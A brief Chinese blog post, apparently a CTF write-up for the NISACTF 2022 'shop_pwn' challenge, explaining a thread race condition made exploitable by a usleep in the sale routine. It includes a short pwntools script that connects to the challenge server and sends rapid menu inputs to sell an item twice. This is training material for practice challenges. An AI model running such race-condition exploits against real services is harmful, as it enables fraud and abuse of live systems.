PWN入门-多线程竞争做题

发表于2024-05-10|更新于2024-05-10

|阅读量:

PWN入门-多线程竞争做题

[NISACTF 2022]shop_pwn

函数sale和buy中都用pthread_create创建新线程，但只有to_sale函数中存在usleep可利用延时进行条件竞争。

连续两次快速卖出即可，实践证明加上recvuntil后时间就卡不进去。

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
p=remote("node5.anna.nssctf.cn",28653)
p.sendline(b'3')
p.sendline(b'0')
p.sendline(b'3')
p.sendline(b'0')
p.sendline(b'2')
p.sendline(b'1')
p.interactive()

文章作者: Monoceros406

文章链接: http://monoceros.github.io/2024/05/10/PWN%E5%85%A5%E9%97%A8-%E5%A4%9A%E7%BA%BF%E7%A8%8B%E7%AB%9E%E4%BA%89%E5%81%9A%E9%A2%98/

PWN